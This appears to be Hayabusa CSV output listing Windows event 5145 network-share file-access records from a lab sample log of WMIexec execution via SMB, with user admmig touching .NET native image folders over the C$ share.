IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
